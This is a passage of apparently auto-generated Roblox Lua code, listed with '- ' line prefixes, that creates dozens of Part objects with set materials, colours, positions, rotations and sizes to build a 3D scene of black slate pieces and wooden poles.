- ["CFrame"] = CFrame.new(184.646622, 21.8386478, 48.968811, -0.552362323, 0.560341597, 0.617181599, -0.744461238, 0.00152970874, -0.667663932, -0.375063896, -0.828260183, 0.416307688),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o50 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(185.088684, 23.8786678, 49.20261),
- ["Rotation"] = Vector3.new(-24.1402454, 53.4266129, -70.1159058),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(185.088684, 23.8786678, 49.20261, 0.202660471, 0.560329139, 0.803094327, -0.969853044, 0.00151220511, 0.243686706, 0.135330439, -0.828268468, 0.543743491),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o51 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(183.535263, 25.498682, 48.1962624),
- ["Rotation"] = Vector3.new(-85.4995804, 6.46079874, -34.3253441),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(183.535263, 25.498682, 48.1962624, 0.820604146, 0.560310245, 0.112523399, -0.136887312, 0.00154601841, 0.990585506, 0.554861546, -0.828281343, 0.0779680759),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o52 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(184.321106, 25.1886463, 48.6368637),
- ["Rotation"] = Vector3.new(-76.653244, 18.7037678, -36.2674255),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(184.321106, 25.1886463, 48.6368637, 0.763685226, 0.560314417, 0.320675284, -0.388122678, 0.00154758943, 0.921606362, 0.515893102, -0.828278542, 0.218652681),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o53 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(184.718384, 24.8186283, 48.9152679),
- ["Rotation"] = Vector3.new(-60.3471603, 36.0901756, -43.8987579),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(184.718384, 24.8186283, 48.9152679, 0.58228296, 0.560319066, 0.589057803, -0.711916447, 0.00154109334, 0.7022627, 0.39258346, -0.828275502, 0.399797797),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o54 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(184.504532, 8.49658012, 49.4923859),
- ["Rotation"] = Vector3.new(-20.4564514, -32.9116936, -15.3790627),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(184.504532, 8.49658012, 49.4923859, 0.809448063, 0.222640947, -0.543345809, -0.065382503, 0.953750134, 0.2934044, 0.583539963, -0.201970235, 0.786567748),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 15.5199995, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o55 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(198.297943, 19.3338871, 58.4410629),
- ["Rotation"] = Vector3.new(-19.8534527, 54.4231644, -70.164238),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(198.297943, 19.3338871, 58.4410629, 0.197416469, 0.547273278, 0.813336015, -0.978487372, 0.0593233854, 0.197585478, 0.0598835051, -0.834846675, 0.547212481),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o56 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(195.97644, 24.0935097, 56.3961487),
- ["Rotation"] = Vector3.new(89.9992599, 0.158405349, -145.922668),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(195.97644, 24.0935097, 56.3961487, -0.828277707, 0.560308456, 0.00276469137, -0.00229723868, 0.00153836422, -0.999994636, -0.560311198, -0.828279614, 1.29616756e-005),
- ["CanCollide"] = false,
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.12979889, 0.266975969, 0.849945545),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o57 = Create("BlockMesh",{
- ["Parent"] = o56,
- ["Scale"] = Vector3.new(1, 0.749083102, 1),
- })
- o58 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(199.71759, 17.1437836, 59.3128815),
- ["Rotation"] = Vector3.new(-79.3813553, 9.9000473, -33.7470207),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(199.71759, 17.1437836, 59.3128815, 0.819115698, 0.547254026, 0.171929911, -0.242879167, 0.0593448132, 0.968238413, 0.519670069, -0.834857821, 0.181527063),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o59 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(198.235672, 20.723896, 58.3648262),
- ["Rotation"] = Vector3.new(3.18686366, 56.8166161, -89.2647476),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(198.235672, 20.723896, 58.3648262, 0.00702333124, 0.547272801, 0.836923063, -0.997772634, 0.0593353398, -0.0304268375, -0.0663110316, -0.834846079, 0.546471834),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o60 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(198.427353, 21.9839039, 58.5621643),
- ["Rotation"] = Vector3.new(32.7876167, 53.2893982, -113.717636),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(198.427353, 21.9839039, 58.5621643, -0.240441248, 0.547282755, 0.801665068, -0.944294155, 0.059309613, -0.32370919, -0.224707544, -0.834841132, 0.502536833),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o61 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(207.201599, 19.9389153, 64.4214554),
- ["Rotation"] = Vector3.new(74.8750992, 21.2280579, -143.052628),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(207.201599, 19.9389153, 64.4214554, -0.744960308, 0.560295641, 0.362081081, -0.436183661, 0.00157364528, -0.899856031, -0.504755616, -0.828290582, 0.243219465),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o62 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(207.933716, 20.698925, 64.8798294),
- ["Rotation"] = Vector3.new(51.2138329, 42.8680077, -130.140396),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(207.933716, 20.698925, 64.8798294, -0.472487777, 0.560295224, 0.680311739, -0.820735931, 0.00156722707, -0.571305096, -0.321165979, -0.82829082, 0.459114045),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o63 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(205.374863, 20.0093746, 63.1795235),
- ["Rotation"] = Vector3.new(113.624832, -30.53512, -139.418625),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(205.374863, 20.0093746, 63.1795235, -0.654156029, 0.560310602, -0.508066416, 0.614223838, 0.00154896674, -0.789129674, -0.441371262, -0.828280389, -0.345169693),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o64 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(204.460754, 23.2823944, 62.643425),
- ["Rotation"] = Vector3.new(179.765121, -55.9218445, -90.2831726),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(204.460754, 23.2823944, 62.643425, -0.00276924483, 0.560315967, -0.828274012, 0.999996006, 0.00154677778, -0.00229700468, -5.89298361e-006, -0.828277051, -0.560318172),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(2.88999987, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o65 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(204.803314, 20.6593723, 62.8916245),
- ["Rotation"] = Vector3.new(134.809891, -46.1191902, -126.065994),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(204.803314, 20.6593723, 62.8916245, -0.408074826, 0.560308695, -0.720783293, 0.870727539, 0.00154980388, -0.491761923, -0.274421781, -0.828281522, -0.488509387),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o66 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(204.531158, 21.3494549, 62.6761246),
- ["Rotation"] = Vector3.new(162.770752, -54.6758614, -104.287605),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(204.531158, 21.3494549, 62.6761246, -0.142693669, 0.560316086, -0.815894067, 0.985224009, 0.00152560498, -0.171260402, -0.0947153196, -0.828276515, -0.552255213),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o67 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(206.170364, 19.7290249, 63.7011604),
- ["Rotation"] = Vector3.new(89.3573914, 1.1100409, -145.917831),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(206.170364, 19.7290249, 63.7011604, -0.828079045, 0.560276091, 0.0193726551, -0.0223292559, 0.00156648294, -0.999749124, -0.560166478, -0.828303695, 0.0112132533),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.40999985, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o68 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(206.771347, 16.5824585, 64.1658707),
- ["Rotation"] = Vector3.new(75.3465652, 20.6415348, -143.218811),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(206.771347, 16.5824585, 64.1658707, -0.749511421, 0.560322464, 0.352520138, -0.424629688, 0.00159771508, -0.905365288, -0.507859826, -0.828272581, 0.236731872),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o69 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(205.019043, 16.4144821, 63.1887512),
- ["Rotation"] = Vector3.new(90.1799774, -0.102281392, -145.921326),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(205.019043, 16.4144821, 63.1887512, -0.828267097, 0.560329497, -0.00178514607, 0.00323819369, 0.0016015349, -0.999993265, -0.560322762, -0.828267694, -0.00314115616),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(2.71999979, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o70 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(207.619812, 17.2128716, 64.5932465),
- ["Rotation"] = Vector3.new(57.5355453, 38.5155411, -134.265167),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(207.619812, 17.2128716, 64.5932465, -0.546126544, 0.560317755, 0.622726858, -0.751120746, 0.00159627607, -0.660162449, -0.37089473, -0.828275919, 0.419994324),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o71 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(208.075317, 18.1629028, 64.8226929),
- ["Rotation"] = Vector3.new(31.9797554, 51.4604034, -115.933022),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(208.075317, 18.1629028, 64.8226929, -0.272474289, 0.560316443, 0.782177746, -0.943985462, 0.00159349968, -0.329981744, -0.186140716, -0.828276515, 0.528496623),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o72 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(202.68396, 19.0691204, 61.4447098),
- ["Rotation"] = Vector3.new(-0.234880283, 55.9217491, -89.7170486),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(202.68396, 19.0691204, 61.4447098, 0.00276708649, 0.560315192, 0.828273058, -0.999994814, 0.00154283375, 0.0022969977, 9.09945811e-006, -0.82827574, 0.560317516),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.04999971, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o73 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(201.179779, 20.1252537, 60.4491997),
- ["Rotation"] = Vector3.new(89.9992599, 0.158405349, -145.922668),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(201.179779, 20.1252537, 60.4491997, -0.828277707, 0.560308456, 0.00276469137, -0.00229723868, 0.00153836422, -0.999994636, -0.560311198, -0.828279614, 1.29616756e-005),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(2.69999981, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o74 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(201.670578, 24.0934944, 60.6078224),
- ["Rotation"] = Vector3.new(89.9992599, 0.158405349, -145.922668),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(201.670578, 24.0934944, 60.6078224, -0.828277707, 0.560308456, 0.00276469137, -0.00229723868, 0.00153836422, -0.999994636, -0.560311198, -0.828279614, 1.29616756e-005),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.12999964, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o75 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(201.529266, 17.0826435, 60.6669693),
- ["Rotation"] = Vector3.new(-87.6582565, -2.63452959, -33.2191429),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(201.529266, 17.0826435, 60.6669693, 0.835695863, 0.547262967, -0.0459650122, 0.0160363633, 0.0593429506, 0.998107672, 0.548956037, -0.834852099, 0.0408164822),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.78999972, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o76 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(200.068741, 23.8915558, 59.6800728),
- ["Rotation"] = Vector3.new(80.1659164, 14.3155565, -144.672363),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(200.068741, 23.8915558, 59.6800728, -0.790523827, 0.560294688, 0.247262105, -0.29752934, 0.0015340565, -0.954709709, -0.535299718, -0.828288674, 0.165491924),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o77 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(205.460205, 8.45180416, 63.7996445),
- ["Rotation"] = Vector3.new(-20.4563732, -32.9117126, -9.11684704),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(205.460205, 8.45180416, 63.7996445, 0.828903079, 0.133018747, -0.543346107, 0.0390408412, 0.955191135, 0.293403238, 0.558027565, -0.264415443, 0.786567867),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 16.8899994, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o78 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(199.578186, 23.6400299, 59.4329987),
- ["Rotation"] = Vector3.new(77.1047592, 24.039917, -143.1828),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(199.578186, 23.6400299, 59.4329987, -0.731111765, 0.547284007, 0.407372981, -0.45163545, 0.0593091734, -0.890227497, -0.511369526, -0.834840059, 0.203811571),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o79 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(198.918106, 23.0038776, 58.9437561),
- ["Rotation"] = Vector3.new(64.2602768, 37.2378998, -136.573837),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(198.918106, 23.0038776, 58.9437561, -0.578196704, 0.547273636, 0.605125844, -0.694406927, 0.0592978597, -0.717133045, -0.42835173, -0.834847629, 0.345745385),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o80 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(198.565948, 18.4238796, 58.5760155),
- ["Rotation"] = Vector3.new(-37.6424026, 48.7856941, -56.162323),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(198.565948, 18.4238796, 58.5760155, 0.366889238, 0.547273755, 0.752250373, -0.913540065, 0.0593223944, 0.402395725, 0.175595641, -0.834846497, 0.521722317),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o81 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(199.003098, 17.6638699, 58.9529953),
- ["Rotation"] = Vector3.new(-57.2756462, 36.258976, -42.7410393),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(199.003098, 17.6638699, 58.9529953, 0.592206717, 0.547258496, 0.591435969, -0.732320845, 0.0593404695, 0.678367257, 0.336146712, -0.834855139, 0.435911357),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o82 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(208.206848, 22.9639301, 65.0174026),
- ["Rotation"] = Vector3.new(-1.16700768, 55.9170227, -88.9439545),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(208.206848, 22.9639301, 65.0174026, 0.0103282901, 0.560297132, 0.828226864, -0.999933422, 0.00156213157, 0.0114133479, 0.00510081183, -0.828289866, 0.560275912),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.8499999, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o83 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(208.209534, 19.7840137, 65.0152969),
- ["Rotation"] = Vector3.new(1.44929802, 55.9159698, -91.1106186),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(208.209534, 19.7840137, 65.0152969, -0.0108622499, 0.560302436, 0.828216553, -0.999897957, 0.00156807748, -0.0141740134, -0.0092407437, -0.828286529, 0.560228407),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.23000002, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o84 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(208.209534, 19.7840137, 65.0152969),
- ["Rotation"] = Vector3.new(1.44929802, 55.9159698, -91.1106186),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(208.209534, 19.7840137, 65.0152969, -0.0108622499, 0.560302436, 0.828216553, -0.999897957, 0.00156807748, -0.0141740134, -0.0092407437, -0.828286529, 0.560228407),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.23000002, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o85 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(182.277084, 21.0797443, 47.3405685),
- ["Rotation"] = Vector3.new(179.765121, -55.9211922, -90.282959),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(182.277084, 21.0797443, 47.3405685, -0.00276714657, 0.560315251, -0.828267634, 0.999991953, 0.0015430206, -0.00229700701, -9.01422482e-006, -0.828268468, -0.560318887),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(8.31999969, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o86 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(182.517639, 25.5686283, 47.5269775),
- ["Rotation"] = Vector3.new(-90.0005188, -0.158545598, -34.0780296),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(182.517639, 25.5686283, 47.5269775, 0.828271925, 0.560319185, -0.00276713911, 0.00229699956, 0.00154302793, 0.999996185, 0.56032151, -0.828275383, -9.00608575e-006),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o87 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(183.844986, 17.0324554, 48.4183846),
- ["Rotation"] = Vector3.new(89.9609909, 0.214699239, -145.925552),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(183.844986, 17.0324554, 48.4183846, -0.828304052, 0.560265243, 0.00374719966, -0.00348430686, 0.0015354465, -0.999992371, -0.560267389, -0.828310609, 0.00068082643),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(4.67999983, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o88 = Create("Part",{
- ["Parent"] = o1,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(183.187271, 21.4782429, 47.982975),
- ["Rotation"] = Vector3.new(-90.0005188, -0.158545598, -34.0780296),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(183.187271, 21.4782429, 47.982975, 0.828271925, 0.560319185, -0.00276713911, 0.00229699956, 0.00154302793, 0.999996185, 0.56032151, -0.828275383, -9.00608575e-006),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o89 = Create("Model",{
- ["Parent"] = mas,
- })
- o90 = Create("Part",{
- ["Parent"] = o89,
- ["BrickColor"] = BrickColor.new("Pastel Blue"),
- ["Reflectance"] = 0.40000000596046,
- ["Transparency"] = 0.39999997615814,
- ["Position"] = Vector3.new(812.911743, 55.1542664, 189.906403),
